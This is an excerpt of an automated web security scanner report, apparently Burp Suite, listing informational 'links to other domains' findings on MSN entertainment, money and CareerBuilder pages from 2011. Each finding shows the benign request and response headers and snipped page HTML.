Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:12:53 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 64260


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><link rel="search" type="application/opensearchdescription+xml" title="Live Search" href="http://www.live.com/live/search/search.xml" /><script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
                   <a href="http://mail.live.com" class="flytrigger unreadcount" target="_top">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox" target="_top">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com" target="_top">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts" target="_top">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose" target="_top">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger" target="_top">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://bing.com" target="_top">Bing</a>
...[SNIP]...
<li class="first">
                   <a id="hplink" href="http://myhomemsn.com" target="_top">Make MSN your homepage</a>
                   <a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search" target="_top">Web</a>
...[SNIP]...
<li class="last noscript"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296353573&amp;rver=5.5.4177.0&amp;wp=MBI&amp;wreply=http://redacted/pploggedin.aspx?Page=http://moneycentral.msn.com/investor/partsub/funds/etfperformancetracker.aspx&Query=fam=&cat=&p=0&tab=mkt&s=ytd&o=d&amp;lc=1033&amp;id=229" target="_top">Sign in</a>
...[SNIP]...
<li class="flyout"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" target="_top">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" target="_top">click for restrictions</a>). Real-time quotes provided by <a href="http://batstrading.com/" target="_top">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" target="_top">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" target="_top">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/" target="_top">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" target="_top">Hoover's Inc</a>. Index membership data provided by <a href="http://www.telekurs.com/tkfich_index/tkhoch_home.htm" target="_top">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" target="_top">Nomura Research Institute Ltd.</a>; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" target="_top">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_top">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn" target="_top">Advertise</a>
...[SNIP]...
<!-- A02:65.54.150.52:01/29/2011 18:12:53 --><img src="http://switch.atdmt.com/action/MSN_enUS_Money" height="1" width="1" border="0" alt="" /><div style="display:none">
...[SNIP]...
<noscript><img src="http://msnportalmoney.112.2O7.net/b/ss/msnportalmoney/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.229. http://movies.redacted/mom-pop-culture/tiger-mom-movie/story-feature/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.redacted
Path:   /mom-pop-culture/tiger-mom-movie/story-feature/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /mom-pop-culture/tiger-mom-movie/story-feature/?GT1=28101 HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 48647
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=68ce55a47fad475cb115589b40f84311; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Mom &amp;
...[SNIP]...
<link rel="shortcut icon" href="http://blstc.msn.com/br/gbl/lg/1/favicon.ico" /><link rel="stylesheet" href="http://entcss.s-msn.com/styles/entertainment9613.css" rev="stylesheet" type="text/css"/><link rel="stylesheet" href="http://entcss.s-msn.com/styles/gtl_sitegeneric9613.css" rev="stylesheet" type="text/css"/>
<link rel="stylesheet" href="http://entcss.s-msn.com/styles/e9613.css" rev="stylesheet" type="text/css"/>
<style>
...[SNIP]...
</style>
<link rel="stylesheet" href="http://entcss.s-msn.com/App_Themes/IE7/IE79613.css" rev="stylesheet" type="text/css"/><script type="text/javascript">
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" rel="">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" rel="">MLB</a></li><li class=""><a href="http://msn.foxsports.com/nascar " rel="">NASCAR</a></li><li class=""><a href="http://msn.foxsports.com/nba" rel="">NBA</a></li><li class=""><a href="http://msn.foxsports.com/collegebasketball" rel="">NCAA Basketball</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/cfb" rel="">NCAA Football</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nfl" rel=""><strong>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nhl" rel="">NHL</a></li><li class=""><a href="http://msn.foxsports.com/fantasy" rel="">Play Fantasy</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/foxsoccer" rel="">Soccer</a></li><li class=""><a href="http://msn.foxsports.com/video?from=en-us_msnhp" rel="">Video Highlights</a>
...[SNIP]...
<li class=""><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home" rel="">Careers &amp; Jobs</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel=""> Cooking</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV " rel=""> Travel</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" rel="">Maps &amp; Directions</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" rel="">Video</a>
...[SNIP]...
<li class=""><a href="http://insidemsn.wordpress.com" rel="">Corrections &amp; Clarifications</a>
...[SNIP]...
<li class=""><a href="http://msn.whitepages.com/" rel="">White Pages</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel="">Delish</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/shopping?FORM=SHOPH2" rel="">Shopping</a></li><li class=""><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" rel="">Feedback</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV " rel="">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?Form=MOVIES">Bing</a>
...[SNIP]...
<li id="first"><a href="http://mail.live.com">Hotmail</a><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344907&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fmovies.redacted%2Fmom-pop-culture%2Ftiger-mom-movie%2Fstory-feature%2F%3FGT1%3D28101&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2fmovies.redacted%2fmom-pop-culture%2ftiger-mom-movie%2fstory-feature%2f%3fGT1%3d28101%26ppcb%3d">Sign in</a>
...[SNIP]...
<a href="http://www.redacted"><img id="msnLogo" src="http://entimg.s-msn.com/i/grandprix/msft.png" alt="MSN" style="border-width:0px;" /></a>
...[SNIP]...
<div class=""><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
</a><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</script><img id="clickTarget" style="display:none" src="http://entimg.s-msn.com/i/sp.gif" onReadyStateChange="if(SF('ctStateChange')) ctStateChange();" alt="" ></object>
...[SNIP]...
<BR><a href=http://www.zap2it.com/ class="art">Zap2it</a>
...[SNIP]...
</STRONG> <a href=http://www.bing.com/search?q=tiger+mom&amp;go=&amp;form=msnena class="art">'Tiger Mother'</a>
...[SNIP]...
<DIV id=modTwitterPromo><a href=http://twitter.com/msntv class="altlink"><IMG border=0 alt=Twitter src="http://entimg.msn.com/i/mompopculture/2/btn_twitterPromo.jpg" width=300 height=61>
...[SNIP]...
<div class="pageFooter_link"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_new">MSN Privacy</a>
...[SNIP]...
<div class="pageFooter_logo"><img id="microsoftLogo" src="http://entimg.s-msn.com/i/ms/ms_logo.gif" style="border-width:0px;" /></div>
...[SNIP]...
<noscript><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section --><script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

22.230. http://movies.redacted/mom-pop-culture/tiger-mom-movie/story-feature/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.redacted
Path:   /mom-pop-culture/tiger-mom-movie/story-feature/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /mom-pop-culture/tiger-mom-movie/story-feature/?GT1=28101 HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 48647
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=88d234b32c52460790a7f98c1f7a5462; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:51:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Mom &amp;
...[SNIP]...
<link rel="shortcut icon" href="http://blstc.msn.com/br/gbl/lg/1/favicon.ico" /><link rel="stylesheet" href="http://entcss.s-msn.com/styles/entertainment9613.css" rev="stylesheet" type="text/css"/><link rel="stylesheet" href="http://entcss.s-msn.com/styles/gtl_sitegeneric9613.css" rev="stylesheet" type="text/css"/>
<link rel="stylesheet" href="http://entcss.s-msn.com/styles/e9613.css" rev="stylesheet" type="text/css"/>
<style>
...[SNIP]...
</style>
<link rel="stylesheet" href="http://entcss.s-msn.com/App_Themes/IE7/IE79613.css" rev="stylesheet" type="text/css"/><script type="text/javascript">
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" rel="">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" rel="">MLB</a></li><li class=""><a href="http://msn.foxsports.com/nascar " rel="">NASCAR</a></li><li class=""><a href="http://msn.foxsports.com/nba" rel="">NBA</a></li><li class=""><a href="http://msn.foxsports.com/collegebasketball" rel="">NCAA Basketball</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/cfb" rel="">NCAA Football</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nfl" rel=""><strong>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nhl" rel="">NHL</a></li><li class=""><a href="http://msn.foxsports.com/fantasy" rel="">Play Fantasy</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/foxsoccer" rel="">Soccer</a></li><li class=""><a href="http://msn.foxsports.com/video?from=en-us_msnhp" rel="">Video Highlights</a>
...[SNIP]...
<li class=""><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home" rel="">Careers &amp; Jobs</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel=""> Cooking</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV " rel=""> Travel</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" rel="">Maps &amp; Directions</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" rel="">Video</a>
...[SNIP]...
<li class=""><a href="http://insidemsn.wordpress.com" rel="">Corrections &amp; Clarifications</a>
...[SNIP]...
<li class=""><a href="http://msn.whitepages.com/" rel="">White Pages</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel="">Delish</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/shopping?FORM=SHOPH2" rel="">Shopping</a></li><li class=""><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" rel="">Feedback</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV " rel="">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?Form=MOVIES">Bing</a>
...[SNIP]...
<li id="first"><a href="http://mail.live.com">Hotmail</a><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406294&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fmovies.redacted%2Fmom-pop-culture%2Ftiger-mom-movie%2Fstory-feature%2F%3FGT1%3D28101&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2fmovies.redacted%2fmom-pop-culture%2ftiger-mom-movie%2fstory-feature%2f%3fGT1%3d28101%26ppcb%3d">Sign in</a>
...[SNIP]...
<a href="http://www.redacted"><img id="msnLogo" src="http://entimg.s-msn.com/i/grandprix/msft.png" alt="MSN" style="border-width:0px;" /></a>
...[SNIP]...
<div class=""><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
</a><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</script><img id="clickTarget" style="display:none" src="http://entimg.s-msn.com/i/sp.gif" onReadyStateChange="if(SF('ctStateChange')) ctStateChange();" alt="" ></object>
...[SNIP]...
<BR><a href=http://www.zap2it.com/ class="art">Zap2it</a>
...[SNIP]...
</STRONG> <a href=http://www.bing.com/search?q=tiger+mom&amp;go=&amp;form=msnena class="art">'Tiger Mother'</a>
...[SNIP]...
<DIV id=modTwitterPromo><a href=http://twitter.com/msntv class="altlink"><IMG border=0 alt=Twitter src="http://entimg.msn.com/i/mompopculture/2/btn_twitterPromo.jpg" width=300 height=61>
...[SNIP]...
<div class="pageFooter_link"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_new">MSN Privacy</a>
...[SNIP]...
<div class="pageFooter_logo"><img id="microsoftLogo" src="http://entimg.s-msn.com/i/ms/ms_logo.gif" style="border-width:0px;" /></div>
...[SNIP]...
<noscript><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section --><script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

22.231. http://msn.careerbuilder.com/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.careerbuilder.com
Path:   /Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/?SiteId=cbmsnjm41302&sc_extcmp=JS_1302_jobmod HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 58392
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=24c91384a1e04a54846bef9dfe30c9a9-349642136-wu-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1974D75CFDC14C84277751A6FC5FDDCEDB3DE162DD8C2B86D6AA3B4A5DE5C92A7E08B60EBA426E3E7821B419A826DD78A; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:56 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR31
Date: Sat, 29 Jan 2011 23:48:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   MSN Ca
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/cbglobal.css" /><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/msncareeradvice.css" /><link rel="stylesheet" type="text/css" href="http://img.icbdr.com/v11.89/css/msn_full.css" /><script type="text/javascript">
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
...[SNIP]...
<!--[if !IE]>-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js">
</script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/voodoo/js/9/core.js "></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>
<script type="text/javascript" src="http://ads1.redacted/library/dap.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<div id="reporting">
<img id="ctag" width="1" height="1" alt="" src="http://c.redacted/c.gif?di=15128&amp;pi=7327&amp;ps=45019&amp;tp=http://specials.redacted/mopsdk/standard/careers/msnshell.aspx&amp;rf=" />

<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
<li class="c1"><a href="http://www.msnbc.redacted/">News</a>
...[SNIP]...
<li class="first"><a href="http://www.msnbc.redacted/id/3032076/ns/health">Health News</a>
...[SNIP]...
<li><a href="http://local.msn.com/news.aspx"><strong>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032619/ns/nightly_news/">NBC Nightly News</a>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032553/ns/politics">Politics</a></li><li><a href="http://www.msnbc.redacted/id/3032118/ns/technology_and_science">Tech &amp; Science</a>
...[SNIP]...
<li><a href="http://today.msnbc.redacted/">Today Show</a></li><li><a href="http://www.msnbc.redacted/id/3032525/ns/us_news">US News</a></li><li><a href="http://www.msnbc.redacted/id/8004316/?from=en-us_msnhp">Video</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.msnbc.redacted/id/3032507/ns/world_news">World News</a>
...[SNIP]...
<li class="c2"><a href="http://entertainment.redacted/">Entertainment</a>
...[SNIP]...
<li class="first"><a href="http://wonderwall.redacted/"><strong>
...[SNIP]...
<li><a href="http://thebubble.redacted/ ">Comedy</a></li><li><a href="http://entertainment.redacted/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home">Games</a></li><li><a href="http://movies.msn.com/">Movies</a></li><li><a href="http://music.msn.com/">Music</a></li><li><a href="http://movies.msn.com/new-on-dvd/movies/">New on DVD</a></li><li><a href="http://tv.redacted/"> TV</a></li><li><a href="http://entertainment.redacted/video/?from=en-us_msnhp"> Video</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb"> MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li class="c4"><a href="http://moneycentral.redacted/home.asp">Money</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.msnbc.redacted/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/investor/home.aspx">Investing</a></li><li><a href="http://moneycentral.redacted/personal-finance/">Personal Finance</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote"><strong>
...[SNIP]...
<li><a href="http://realestate.redacted/">Real Estate &amp; Rentals</a>
...[SNIP]...
<li><a href="http://articles.redacted/video/default.aspx?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c5"><a href="http://lifestyle.redacted/">Lifestyle</a>
...[SNIP]...
<li class="first"><a href="http://lifestyle.redacted/your-look/">Beauty &amp; Fashion</a>
...[SNIP]...
<li><a href="http://www.delish.com/"><strong>
...[SNIP]...
<li><a href="http://lifestyle.redacted/your-home/">Decor &amp; Organizing</a>
...[SNIP]...
<li><a href="http://glo.redacted/">Glo: For Her</a>
...[SNIP]...
<li><a href="http://health.msn.com/">Health, Diet &amp; Fitness</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&amp;Af=-1000&amp;VS">Horoscopes</a></li><li><a href="http://lifestyle.redacted/relationships/">Love &amp; Relationships</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670269">Online Dating</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a></li><li><a href="http://lifestyle.redacted/your-look/video/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c6 last fluid"><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a></li><li><a href="http://careers.msn.com/">Careers &amp; Jobs</a>
